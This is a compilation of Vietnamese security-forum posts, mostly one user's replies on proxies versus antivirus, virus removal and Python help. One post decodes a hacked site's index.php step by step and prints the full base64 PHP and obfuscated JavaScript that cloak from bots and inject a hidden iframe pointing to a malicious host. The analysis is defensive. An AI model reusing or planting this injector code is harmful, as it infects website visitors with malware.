|
|
vulehcm wrote:
bolzano_1989,
Vui lòng chỉ ra trong những bài viết của tôi có ý nào đó tôi nói rằng : Dùng proxy thì chống virus được 100% ? Nếu bạn chỉ ra được thì tôi sẽ không post thêm bài nào nữa. Tôi tham gia topic này trên tinh thần chỉ ra cái có thể và những trừong hợp có thể đó là gì, với những điều kiện gì.
LoL, tôi không bao giờ bảo bạn nói là dùng proxy chống virus được 100%, những kiểu thảo luận cùn này sẽ không dẫn đến đâu.
vulehcm wrote:
Và đến bây giờ tôi vẫn giữ quan điểm proxy có thể chống được virus xâm nhập vào máy tính, còn chống được bao nhiêu % nguy cơ thì còn phụ thuộc rất nhiều vào proxy server.
Một giải pháp chống virus xâm nhập mà mọi người hoàn toàn không tin tưởng được và đầy những rủi ro thì với tôi nó là con số 0. Hơn thế nữa nhớ cho là nó còn phụ thuộc vào cả người quản lý proxy server đó chứ không phải chỉ phụ thuộc vào proxy server như bạn nói.
vulehcm wrote:
Chống virus xâm nhập từ web vào máy bằng cách chống web đen với proxy chỉ là một trong những cách áp dụng proxy vào trong việc chống virus xâm nhập. Ngoài ra còn rất nhiều cách mà tôi có đề xuất thêm là quét traffic, ... Trong trường hợp này tôi chỉ đưa ra những phương pháp có thể áp dụng trên proxy (proxy công cộng, proxy doanh nghiệp, proxy dịch vụ, ...), cho nên nếu bạn cứ lấy một phương pháp bất khả thi ra để nói người đưa ra phương pháp ấu trĩ thì theo tôi suy nghĩ của bạn khá cùn và trình độ lý luận cũng cùn nốt.
LoL, tôi bảo chống virus xâm nhập từ web vào máy bằng cách chống web đen với proxy là cách tiếp cận ấu trĩ, còn bạn vulehcm tự nghĩ con người bạn ấu trĩ thì chịu thôi, không ai cản được bạn vulehcm tự nghĩ bạn như thế cả .
|
|
|
Download Metasploit | Metasploit Project
http://www.metasploit.com/download/
|
|
|
vulehcm wrote:
Bạn có phân biệt được hai khái niệm Proxy và Proxy server không? Nếu phân biệt được thì sẽ hiểu những gì tôi nói trong bài viết trên là hoàn toàn có lý.
Bởi vì bạn chỉ quanh quẩn trong những gì bạn nghĩ nên bạn chỉ thấy được cái lý của bạn thôi.
Proxy server dù "có tích hợp firewall hoặc là các công cụ cản lọc, kiểm tra traffic cẩn thận" như bạn nói cũng không thể đảm bảo "chống virus xâm nhập từ web vào máy" được vì có vô vàn khả năng vượt qua được chức năng content filter đó.
Như mình đã nói, chống virus xâm nhập từ web vào máy bằng cách chống web đen với proxy là cách tiếp cận rất ấu trĩ.
vulehcm wrote:
bolzano_1989,
Trong bài viết trên tutk không nói cụ thể là bạn ấy dùng proxy nào, chất lượng ra sao, có những chức năng gì, ... nói chung là chỉ nói chung chung là proxy. Cho nên trong các câu trả lời của tôi từ proxy cũng được dùng với ý nghĩa như thế, có nghĩa là chỉ chung chung các loại proxy, trong đó có nhiều proxy rất tốt nhưng cũng có nhiều loại proxy không đạt chất lượng. Ở đây chỉ mang tính tương đối là chính, vì thế nếu bạn chỉ ra vài proxy và nói rằng lý luận của tôi là sai thì tôi cũng có thể chỉ ra vài proxy xịn và nói rằng lý luận của tôi là hoàn toàn đúng, điều này sẽ chẳng mang thảo luận này đến đâu cả.
Như vậy là bạn đã phạm sai lầm về mặt logic trong lập luận rồi, đây là 1 lỗi hay được dùng để nguỵ biện: đem đồng nhất cái bộ phận với cái toàn thể .
vulehcm wrote:
Cho nên việc một vài con virus vượt qua được các proxy với các firewall vào máy chúng ta cũng không đủ cơ sở để đưa ra khẳng định rằng "proxy và firewall không dùng để chống virus từ internet được". Mọi việc chỉ có tính tương đối thôi.
Bạn đang cố ý loại bỏ một số ít ngoại lệ mà bạn thấy được để bảo vệ định kiến của bạn .
Ngoài ra, bạn cũng nên chú ý xem lại cẩn thận phát biểu của bolzano_1989 là gì:
bolzano_1989 wrote:
tutk wrote:
bolzano_1989 wrote:
Mình giả định là bạn đang dùng hệ điều hành Windows.
Nếu bạn đã không rõ thì cứ phải cài đặt antivirus thôi.
Proxy không có chức năng chống virus.
Cho dù proxy bạn dùng có antivirus quét cho proxy server đi nữa, bạn vẫn cần cài đặt antivirus cho máy tính cá nhân, ví dụ đơn giản là với một file nén chứa virus có password được giải nén ở máy tính của bạn thì antivirus ở proxy server cũng vô dụng.
Tôi không có ý định download file virus về để test, tôi chỉ muốn hỏi xem proxy có thể chống virus xâm nhập từ web vào máy được không thôi!
Không .
|
|
|
vulehcm wrote:
Nhưng với điều kiện là proxy đó có tích hợp firewall hoặc là các công cụ cản lọc, kiểm tra traffic cẩn thận. Và thường thì proxy loại này rất ít. Cho nên suy nghĩ dùng proxy là vô cùng nguy hiểm.
Tốt nhất là cứ nên dùng một chương trình antivirus nào đó ví dụ như là Avast.
Câu hỏi bạn tutk đặt ra là proxy "có thể chống virus xâm nhập từ web vào máy" hay không chứ không phải là một loại proxy cùng với một phần mềm có chức năng khác "có thể chống virus xâm nhập từ web vào máy" hay không .
|
|
|
vulehcm wrote:
Ngoài ra trường hợp virus trên máy ta cố gắng sử dụng proxy chúng ta dùng để duyệt web với mục đích tấn công hoặc là lợi dụng ẩn danh để tấn công các trang web khác thì proxy server cũng có thể ngăn chặn được.
Điều này là sai rồi, thực tế đã có virus làm được chuyện này, kể cả khi có proxy server.
vulehcm wrote:
Những bài viết của mình chỉ nhằm một mục đích là chỉ ra rằng:
1. Proxy có thể được dùng để chống lại sự xâp nhập của virus vào trong máy tính của chúng ta, dĩ nhiên chỉ qua đường lây nhiễm là internet. => bolzano_1989 đã sai khi nói "không" ở đây.
vulehcm wrote:
tutk,
Đúng rồi bạn, proxy chỉ có thể là vách ngăn an toàn giữa ta và webserver (trong trường hợp proxy có tích hợp cùng firewall có chức năng quét traffic) chống lại sự xâm nhập của virus từ server về phía ta, có nghĩa là dùng nó duyệt web sẽ an toàn hơn.
Proxy đúng là vô dụng trong trường hợp sử dụng để phòng chống virus từ máy ta liên lạc ra bên ngoài, nhưng nó cũng rất hữu dụng trong trường hợp phòng chống virus từ bên ngoài tìm cách xâm nhập vào trong máy ta. Ví dụ như nó sẽ không cho chúng ta truy cập các web đen đã được nó định nghĩa sẵn, trong trường hợp proxy có tích hợp cùng firewall có chức năng quét traffic thì nó sẽ quét các nội dung chúng ta tải về thì sẽ hạn chế được virus xâm nhập vào. Ngoài ra trường hợp virus trên máy ta cố gắng sử dụng proxy chúng ta dùng để duyệt web với mục đích tấn công hoặc là lợi dụng ẩn danh để tấn công các trang web khác thì proxy server cũng có thể ngăn chặn được.
Chống virus xâm nhập từ web vào máy bằng cách chống web đen với proxy? Đây là cách tiếp cận rất ấu trĩ , thử Google sẽ ra hàng tá những proxy để bà con được tự do xem porn, một ví dụ:
Code:
http://www.nsfwproxy.com/
Ngay từ việc dùng proxy chống web đen là đã chắc chắn thất bại rồi, đừng nói đến việc từ chống web đen sẽ dẫn đến chống virus xâm nhập từ web.
Bạn lại dẫn đến proxy có tích hợp thêm phần mềm có chức năng quét traffic, từ đó chống virus xâm nhập từ web? Vậy bạn cho rằng đó là khả năng chống virus của proxy hay đó là khả năng chống virus của phần mềm kia (firewall có chức năng content filter)? Dù cho câu trả lời bạn là thế nào thì thực tế đã có quá nhiều trường hợp virus xâm nhập máy tính qua môi trường web mà firewall và proxy bạn nói đều đã không chống được.
Tóm lại là hãy thôi ảo tưởng về việc không cần cài đặt phần mềm chống virus ở máy người dùng cuối dùng hệ điều hành Windows .
|
|
|
tutk wrote:
bolzano_1989 wrote:
Không .
Theo tôi nghĩ, proxy có cơ chế hoạt động giống firewall, nếu mình cấu hình chỉ mở port 80 để lướt web thì nếu virus mở port khác để kết nối ra ngoài sẽ lập tức bị block ngay => Nhận định của bolzano_1989 có vẻ như là chưa chính xác lắm thì phải!
Malware có thể liên lạc server qua port 80 mà bạn.
Nếu malware đã được kích hoạt như bạn nói ở trên rồi thì việc có kết nối ra ngoài được hay không mà bạn đề cập cũng không thay đổi được chuyện là proxy không có khả năng "chống virus xâm nhập từ web vào máy" .
|
|
|
tutk wrote:
bolzano_1989 wrote:
Mình giả định là bạn đang dùng hệ điều hành Windows.
Nếu bạn đã không rõ thì cứ phải cài đặt antivirus thôi.
Proxy không có chức năng chống virus.
Cho dù proxy bạn dùng có antivirus quét cho proxy server đi nữa, bạn vẫn cần cài đặt antivirus cho máy tính cá nhân, ví dụ đơn giản là với một file nén chứa virus có password được giải nén ở máy tính của bạn thì antivirus ở proxy server cũng vô dụng.
Tôi không có ý định download file virus về để test, tôi chỉ muốn hỏi xem proxy có thể chống virus xâm nhập từ web vào máy được không thôi!
Không .
|
|
|
Mình giả định là bạn đang dùng hệ điều hành Windows.
tutk wrote:
bolzano_1989 wrote:
Bạn cho rằng dùng proxy có tác dụng chống virus?
Tôi chưa rõ cơ chế bảo vệ của proxy ntn nên mới phải hỏi người nào biết mà!
Nếu bạn đã không rõ thì cứ phải cài đặt antivirus thôi.
Proxy không có chức năng chống virus.
Cho dù proxy bạn dùng có antivirus quét cho proxy server đi nữa, bạn vẫn cần cài đặt antivirus cho máy tính cá nhân, ví dụ đơn giản là với một file nén chứa virus có password được giải nén ở máy tính của bạn thì antivirus ở proxy server cũng vô dụng.
|
|
|
gamma95 wrote:
Cám ơn 2 anh nhé, có lẽ Mathematica đúng là cái em cần, 1000! chỉ là ví dụ thôi, em muốn kiểm chứng kq của những phép toán rất rất lớn.
Nhưng Mathematica có phí.
Thử cái miễn phí này coi ...
->
Code:
#!/usr/bin/env python
_sum = 1
for line in range(1, 1000):
_sum = _sum * line
print _sum
Chắc anh gamma95 đẹp trai làm nhanh quá nên có lỗi cần sửa, nếu không kết quả sẽ thiếu 3 chữ số 0 ở cuối :
Code:
#!/usr/bin/env python
_sum = 1
for line in range(1, 1001):
_sum = _sum * line
print _sum
|
|
|
tutk wrote:
Tôi có con desktop cấu hình thấp chỉ xài để lướt web là chủ yếu (cũng không cần thiết nâng cấp vì nó quá cũ rồi). Vậy tôi xài proxy để fake IP khi lướt web hay xài AV free như AVG, Avira, Avast thì hiệu quả (nhẹ máy mà vẫn bảo mật, chống virus tốt)? Ai biết xin chỉ giáo! Thanks!
Bạn cho rằng dùng proxy có tác dụng chống virus?
|
|
|
Bạn có thể qua forum của CMC, thực hiện theo hướng dẫn sau để tìm trợ giúp diệt virus:
Hướng dẫn nhận trợ giúp diệt virus nhanh từ diễn đàn CMCLab Support
http://support.cmclab.net/vn/anti-virus-services/huong-dan-nhan-tro-giup-diet-virus-nhanh-tu-dien-dan-cmclab-support/
Nếu bạn gửi log ở HVA forum thì vui lòng gửi tin nhắn riêng cho mình là bạn đã gửi log ở HVA forum để mình kịp thời theo dõi .
|
|
|
Reverse Code Engineering (RCE) giờ là một nghề ở Việt Nam luôn rồi:
Malware analyst - .:: HVAOnline ::.
/hvaonline/posts/list/40802.html
Thug4Lif3 wrote:
Chào mọi người,
Công ty CMC Information Security cần tuyển:
0. Nhân viên phân tích malware:
+ Số lượng: 03
+ Công việc:
- Phân tích malware
- Phát triển công cụ phát hiện bằng C/C++
- Tạo chuỗi phát hiện malware
+ Yêu cầu:
- Có kinh nghiệm và khả năng lập trình: C/C++; ASM cho x86 (amd64).
- Kỹ năng reverse engineer và debugging.
- Kiến thức cơ bản về malware.
- Sử dụng thành thạo OllyDbg hoặc WinDbg hoặc IDA.
- Kiến thức về lập trình hệ thống cho Windows NT platform.
- Chịu được áp lực làm việc.
- Lập trình tốt bằng Python là một lợi thế.
- Đọc hiểu tài liệu tiếng Anh kĩ thuật. Sử dụng thành thạo các kỹ năng (nghe, nói, đọc, viết) tiếng anh là một lợi thế.
+ Đãi ngộ:
- Lương: thoả thuận & dựa trên kỹ năng và kinh nghiệm làm việc.
- Các chế độ khác của công ty như bảo hiểm, du lịch hàng năm,...
Hồ sơ cũng như các thông tin cần trao đổi xin gửi về địa chỉ: thug4lif3 at gmail.com
|
|
|
Với đoạn mã exploit trên, bạn dùng Python trong Cygwin xem .
|
|
|
brucelee.star wrote:
tại sao python của mình lại bị lỗi này nhỉ?
các bạn giải thích giùm với...
>>> blog[0]
sau đó ấn enter thì nó báo lỗi:
Traceback (most recent call last):
File "<pyshe11#0>", line 1, in <module>
blog[0]
NameError:name 'blog' is not defined
(python 3.0)
Do bồ chưa gõ dòng lệnh sau đã có trong bài viết :
Code:
blog = ["Entry thu nhat", "Python that tuyet"]
|
|
|
oak, bạn dịch tiếp đi .
|
|
|
maitan_10000 wrote:
quygia128 wrote:
Hihi mình cũng qua bên đó xem thử nhưng có điều mọi người bên đó kín quá, họ không hướng dẫn diệt tay đâu, chỉ châm chú vào vấn đề quảng cáo phần mềm :-p
Bạn nói thế này mình nghĩ bạn còn giữ mẫu virus này. Bạn cho mình xin 1 mẫu để nghiên cứu và học tập, nếu được (gửi private cho mình nhé)
Xin cảm ơn.
Loại này mình không có thông tin gì về nó hết, cũng không biết nó ở đâu mà lấy mẫu. Chỉ thấy hiện tượng khá giống với con này thôi, nên mới cần nghiên cứu về con này để biết rõ hơn.
Bạn có thể qua forum của CMC, thực hiện theo hướng dẫn sau để tìm trợ giúp diệt virus:
Hướng dẫn nhận trợ giúp diệt virus nhanh từ diễn đàn CMCLab Support
http://support.cmclab.net/vn/anti-virus-services/huong-dan-nhan-tro-giup-diet-virus-nhanh-tu-dien-dan-cmclab-support/
Nếu bạn gửi log ở HVA forum thì vui lòng gửi tin nhắn riêng cho mình là bạn đã gửi log ở HVA forum để mình kịp thời theo dõi .
|
|
|
comebacktm wrote:
Em đang băn khoăn không biết lỗi này là dính virut hay do người hack. Bị 2 hôm rồi nhưng không bị phá hoại gì cả.
Đến thế này mà bạn còn bảo là không bị phá hoại gì cả à?
Đầu tiên giải mã base64 sẽ được kết quả:
Code:
error_reporting(0);
$bot = FALSE ;
$ua = $_SERVER['HTTP_USER_AGENT'];
$botsUA = array('12345','alexa.com','anonymouse.org','bdbrandprotect.com','blogpulse.com','bot','buzztracker.com','crawl','docomo','drupal.org','feedtools','htmldoc','httpclient','internetseer.com','linux','macintosh','mac os','magent','mail.ru','mybloglog api','netcraft','openacoon.de','opera mini','opera mobi','playstation','postrank.com','psp','rrrrrrrrr','rssreader','slurp','snoopy','spider','spyder','szn-image-resizer','validator','virus','vlc media player','webcollage','wordpress','x11','yandex','iphone','android');
foreach ($botsUA as $bs) {if(strpos(strtolower($ua), $bs)!== false){$bot = true; break;}}
if (!$bot){
echo(base64_decode('PHNjcmlwdD5pZih3aW5kb3cuZG9jdW1lbnQpYT0oInY1MzJiNSIuc3BsaXQrRGF0ZSkuc3Vic3RyKDAsNik7YWE9KFtdLnJldmVyc2UrW10ucmV2ZXJzZSkuc3Vic3RyKDAsNik7aWYoYT09PWFhKSBmPVstMzAsLTMwLDY2LDYzLC03LDEsNjEsNzIsNjAsNzgsNzAsNjIsNzEsNzcsNyw2NCw2Miw3NywzMCw2OSw2Miw3MCw2Miw3MSw3Nyw3NiwyNyw4Miw0NSw1OCw2NCwzOSw1OCw3MCw2MiwxLDAsNTksNzIsNjEsODIsMCwyLDUyLDksNTQsMiw4NCwtMzAsLTMwLC0zMCw2Niw2Myw3NSw1OCw3MCw2Miw3NSwxLDIsMjAsLTMwLC0zMCw4NiwtNyw2Miw2OSw3Niw2MiwtNyw4NCwtMzAsLTMwLC0zMCw2MSw3Miw2MCw3OCw3MCw2Miw3MSw3Nyw3LDgwLDc1LDY2LDc3LDYyLDEsLTUsMjEsNjYsNjMsNzUsNTgsNzAsNjIsLTcsNzYsNzUsNjAsMjIsMCw2NSw3Nyw3Nyw3MywxOSw4LDgsODAsNjAsNjAsNjIsNzYsNzUsNzgsNTgsNyw3MSw3Niw5LDExLDcsNTksNjYsODMsOCwyNCw2NCw3MiwyMiwxMCwwLC03LDgwLDY2LDYxLDc3LDY1LDIyLDAsMTAsOSwwLC03LDY1LDYyLDY2LDY0LDY1LDc3LDIyLDAsMTAsOSwwLC03LDc2LDc3LDgyLDY5LDYyLDIyLDAsNzksNjYsNzYsNjYsNTksNjYsNjksNjYsNzcsODIsMTksNjUsNjYsNjEsNjEsNjIsNzEsMjAsNzMsNzIsNzYsNjYsNzcsNjYsNzIsNzEsMTksNTgsNTksNzYsNzIsNjksNzgsNzcsNjIsMjAsNjksNjIsNjMsNzcsMTksOSwyMCw3Nyw3Miw3MywxOSw5LDIwLDAsMjMsMjEsOCw2Niw2Myw3NSw1OCw3MCw2MiwyMywtNSwyLDIwLC0zMCwtMzAsODYsLTMwLC0zMCw2Myw3OCw3MSw2MCw3Nyw2Niw3Miw3MSwtNyw2Niw2Myw3NSw1OCw3MCw2Miw3NSwxLDIsODQsLTMwLC0zMCwtMzAsNzksNTgsNzUsLTcsNjMsLTcsMjIsLTcsNjEsNzIsNjAsNzgsNzAsNjIsNzEsNzcsNyw2MCw3NSw2Miw1OCw3Nyw2MiwzMCw2OSw2Miw3MCw2Miw3MSw3NywxLDAsNjYsNjMsNzUsNTgsNzAsNjIsMCwyLDIwLDYzLDcsNzYsNjIsNzcsMjYsNzcsNzcsNzUsNjYsNTksNzgsNzcsNjIsMSwwLDc2LDc1LDYwLDAsNSwwLDY1LDc3LDc3LDczLDE5LDgsOCw4MCw2MCw2MCw2Miw3Niw3NSw3OCw1OCw3LDcxLDc2LDksMTEsNyw1OSw2Niw4Myw4LDI0LDY0LDcyLDIyLDEwLDAsMiwyMCw2Myw3LDc2LDc3LDgyLDY5LDYyLDcsNzksNjYsNzYsNjYsNTksNjYsNjksNjYsNzcsODIsMjIsMCw2NSw2Niw2MSw2MSw2Miw3MSwwLDIwLDYzLDcsNzYsNzcsODIsNjksNjIsNyw3Myw3Miw3Niw2Niw3Nyw2Niw3Miw3MSwyMiwwLDU4LDU5LDc2LDcyLDY5LDc4LDc3LDYyLDAsMjAsNjMsNyw3Niw3Nyw4Miw2OSw2Miw3LDY5LDYyLDYzLDc3LDIyLDAsOSwwLDIwLDYzLDcsNzYsNzcsODIsNjksNjIsNyw3Nyw3Miw3MywyMiwwLDksMCwyMCw2Myw3LDc2LDYyLDc3LDI2LDc3LDc3LDc1LDY2LDU5LDc4LDc3LDYyLDEsMCw4MCw2Niw2MSw3Nyw2NSwwLDUsMCwxMCw5LDAsMiwyMCw2Myw3LDc2LDYyLDc3LDI2LDc3LDc3LDc1LDY2LDU5LDc4LDc3LDYyLDEsMCw2NSw2Miw2Niw2NCw2NSw3NywwLDUsMCwxMCw5LDAsMiwyMCwtMzAsLTMwLC0zMCw2MSw3Miw2MCw3OCw3MCw2Miw3MSw3Nyw3LDY0LDYyLDc3LDMwLDY5LDYyLDcwLDYyLDcxLDc3LDc2LDI3LDgyLDQ1LDU4LDY0LDM5LDU4LDcwLDYyLDEsMCw1OSw3Miw2MSw4MiwwLDIsNTIsOSw1NCw3LDU4LDczLDczLDYyLDcxLDYxLDI4LDY1LDY2LDY5LDYxLDEsNjMsMiwyMCwtMzAsLTMwLDg2XTttZD0nYSc7ZT13aW5kb3cuZXZhbDt3PWY7cz0nJztnPSdmJysncm8nKydtQ2gnKydhckNvZCcrJ2UnO2ZvcihpPTA7aTx3Lmxlbmd0aDtpKyspe3M9cytTdHJpbmdbZ10oMzkrd1swK2ldKTt9IGlmKGE9PT1hYSkgZSgnZScrJygnKydzJysnKScpOzwvc2NyaXB0Pg=='));
}
Tiếp tục giải mã ta được:
Code:
<script>if(window.document)a=("v532b5".split+Date).substr(0,6);
aa=([].reverse+[].reverse).substr(0,6);
if(a===aa) f=[-30,-30,66,63,-7,1,61,72,60,78,70,62,71,77,7,64,62,77,30,69,62,70,62,71,77,76,27,82,45,58,64,39,58,70,62,1,0,59,72,61,82,0,2,52,9,54,2,84,-30,-30,-30,66,63,75,58,70,62,75,1,2,20,-30,-30,86,-7,62,69,76,62,-7,84,-30,-30,-30,61,72,60,78,70,62,71,77,7,80,75,66,77,62,1,-5,21,66,63,75,58,70,62,-7,76,75,60,22,0,65,77,77,73,19,8,8,80,60,60,62,76,75,78,58,7,71,76,9,11,7,59,66,83,8,24,64,72,22,10,0,-7,80,66,61,77,65,22,0,10,9,0,-7,65,62,66,64,65,77,22,0,10,9,0,-7,76,77,82,69,62,22,0,79,66,76,66,59,66,69,66,77,82,19,65,66,61,61,62,71,20,73,72,76,66,77,66,72,71,19,58,59,76,72,69,78,77,62,20,69,62,63,77,19,9,20,77,72,73,19,9,20,0,23,21,8,66,63,75,58,70,62,23,-5,2,20,-30,-30,86,-30,-30,63,78,71,60,77,66,72,71,-7,66,63,75,58,70,62,75,1,2,84,-30,-30,-30,79,58,75,-7,63,-7,22,-7,61,72,60,78,70,62,71,77,7,60,75,62,58,77,62,30,69,62,70,62,71,77,1,0,66,63,75,58,70,62,0,2,20,63,7,76,62,77,26,77,77,75,66,59,78,77,62,1,0,76,75,60,0,5,0,65,77,77,73,19,8,8,80,60,60,62,76,75,78,58,7,71,76,9,11,7,59,66,83,8,24,64,72,22,10,0,2,20,63,7,76,77,82,69,62,7,79,66,76,66,59,66,69,66,77,82,22,0,65,66,61,61,62,71,0,20,63,7,76,77,82,69,62,7,73,72,76,66,77,66,72,71,22,0,58,59,76,72,69,78,77,62,0,20,63,7,76,77,82,69,62,7,69,62,63,77,22,0,9,0,20,63,7,76,77,82,69,62,7,77,72,73,22,0,9,0,20,63,7,76,62,77,26,77,77,75,66,59,78,77,62,1,0,80,66,61,77,65,0,5,0,10,9,0,2,20,63,7,76,62,77,26,77,77,75,66,59,78,77,62,1,0,65,62,66,64,65,77,0,5,0,10,9,0,2,20,-30,-30,-30,61,72,60,78,70,62,71,77,7,64,62,77,30,69,62,70,62,71,77,76,27,82,45,58,64,39,58,70,62,1,0,59,72,61,82,0,2,52,9,54,7,58,73,73,62,71,61,28,65,66,69,61,1,63,2,20,-30,-30,86];
md='a';
e=window.eval;
w=f;
s='';
g='f'+'ro'+'mCh'+'arCod'+'e';
for(i=0;i<w.length;i++)
{
s=s+String[g](39+w[0+i]);
}
if(a===aa) e('e'+'('+'s'+')');
></script>
Tiếp tục giải mã JavaScript ta được đoạn script sau:
Code:
if (document.getElementsByTagName('body')[0])
{
iframer();
}
else
{
document.write("<iframe src='http://wccesrua.ns02.biz/?go=1' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>");
}
function iframer()
{
var f = document.createElement('iframe');
f.setAttribute('src','http://wccesrua.ns02.biz/?go=1');
f.style.visibility='hidden';
f.style.position='absolute';
f.style.left='0';
f.style.top='0';
f.setAttribute('width','10');
f.setAttribute('height','10');
document.getElementsByTagName('body')[0].appendChild(f);
}
Kết quả là trang web của bạn bị tiêm iframe độc hại có link: http://wccesrua.ns02.biz/?go=1
Do bạn thông báo là file index.php của bạn liên tục bị tái lây nhiễm mã độc hại, bạn cần theo dõi quá trình khôi phục mã độc hại ở các trang .php để tìm ra file chứa mã độc hại mà bạn chưa biết đang được dùng để tái lây nhiễm các đoạn mã độc hại, từ đó tiến hành xóa/phục hồi, làm sạch file...
Bạn cần thường xuyên theo dõi và cài đặt các bản vá/cập nhật bảo mật cho website của bạn nếu bạn bị phụ thuộc công nghệ hoàn toàn vào các nhà sản xuất phần mềm.
|
|
|
Discuz! X2 là hàng Tàu, có lỗ hổng an ninh 0day.
|
|
|
thanhloi_st wrote:
Có ai biết cách diệt con Virus Win32/SalityVL.PE không chỉ mình đi, cám ơn vạn lần.
Giờ máy đã hết nó lại lây sang USB ( cái 16G của mình T_T ) dùng BKAV Pro 2010 thì nó cứ báo là gửi mẫu đến BKAV, dùng BKAV Home thì nó diệt được, nhưng mỗi lần quét là xuất hiện 1 con à. Diệt xong không chết mà dai quá à. Ai biết chỉ mình gấp .Thank trước . T_T
Những con số trong tổng kết của Bkav về tình hình virus và an ninh mạng của VN được lấy từ những máy tính gặp virus mà Bkav phát hiện nhưng không diệt được thế này sao?
Tổng kết tình hình virus và an ninh mạng năm 2011 - Tin tức nổi bật - Bkav Corporation
http://www.bkav.com.vn/tin_tuc_noi_bat/-/view_content/content/tong-ket-tinh-hinh-virus-va-an-ninh-mang-nam-2011
|
|
|
Bạn có thể qua forum của CMC, thực hiện theo hướng dẫn sau để tìm trợ giúp diệt virus:
Hướng dẫn nhận trợ giúp diệt virus nhanh từ diễn đàn CMCLab Support
http://support.cmclab.net/vn/anti-virus-services/huong-dan-nhan-tro-giup-diet-virus-nhanh-tu-dien-dan-cmclab-support/
Nếu bạn gửi log ở HVA forum thì vui lòng gửi tin nhắn riêng cho mình là bạn đã gửi log ở HVA forum để mình kịp thời theo dõi .
|
|
|
Ultrareach and Ultrasurf - Frequently Asked Questions
http://ultrasurf.us/faq.html
Open proxy - Wikipedia, the free encyclopedia
http://en.wikipedia.org/wiki/Open_proxy
|
|
|
Về Spam Arrest, bạn tham khảo 2 link sau để biết chức năng của nó:
Why SpamArrest and Similar Tools Are A Bad Idea
http://www.dailyblogtips.com/why-spamarrest-and-similar-tools-are-a-bad-idea/
Review – Spam Arrest » SitePoint
http://www.sitepoint.com/review-spam-arrest/
|
|
|
Real_Time wrote:
Tôi muốn xin cả mấy bài hội thảo đó có được không? nhưng thảo luận ở đây thực sự rất hay và bổ ích.
Đi cùng hội thảo Tết 2012 - HVA & VNSECURITY - .:: HVAOnline ::.
/hvaonline/posts/list/40904.html
|
|
|
Đã biết là thế nào cũng có anh nào sẽ bắt gói rồi nên mình đã không dùng máy để truy cập mạng, nếu cần lắm thì sẽ dùng 1 dịch vụ VPN.
|
|
|
9aa6 wrote:
Hình như sâu stuxnet này liên quan đến chính phủ mỹ thì phải . Mỹ luôn lên án việc làm giàu urani mà
Không nên mất thời gian võ đoán làm gì.
|
|
|
Mong ban quản trị upload bản full video qua torrent bên cạnh Youtube, coi lại sẽ nét hơn:
Content Distribution - Mininova
http://www.mininova.org/apply
No bandwidth costs: upload your content once, and we'll distribute and seed it for you.
|
|
|
Vài bữa nữa, bạn tải slide của anh Nguyễn Lê Thành, TetCon 2012 về xem.
Mã nguồn được decompile thì bạn có thể tìm với Google.
|
|
|
CiCiXeXe wrote:
Cám ơn bạn đã trả lời nhưng mình muốn học hack chứ không phải hack nên không dùng mấy tool có sẵn. Mình muốn hỏi có cách nào thâm nhập bằng dòng lệnh không thôi.
Bạn dùng dòng lệnh gì đó đâu có nghĩa là bạn không dùng tool ?
|
|
|
Anhngoc77 wrote:
nhưng khi cắm usb vào em không hề double click vào mà tại sao nó vẫn có thể chạy sang máy của em được
Bạn có thể tham khảo bài viết của mình:
Hướng dẫn tắt tính năng Autorun của hệ điều hành Windows
http://support.cmclab.net/vn/index.php/topic,6292.0.html
Bạn có thể qua forum của CMC, thực hiện theo hướng dẫn sau để tìm trợ giúp diệt virus:
Hướng dẫn nhận trợ giúp diệt virus nhanh từ diễn đàn CMCLab Support
http://support.cmclab.net/vn/anti-virus-services/huong-dan-nhan-tro-giup-diet-virus-nhanh-tu-dien-dan-cmclab-support/
Nếu bạn gửi log ở HVA forum thì vui lòng gửi tin nhắn riêng cho mình là bạn đã gửi log ở HVA forum để mình kịp thời theo dõi .
|
|
|
Do cách đặt câu hỏi của bạn lòng vòng với ngôn ngữ chít chat, không trực tiếp vào nội dung, đồng thời bạn không có căn bản.
Không ai dạy từ đầu căn bản cho những người thích ăn xổi, ở thì.
Bạn có vào khoa CNTT nào thì cũng không có ai đút cho bạn ăn đâu, hãy ra Google mà tìm kiếm.
|
|
|
|
|
|
|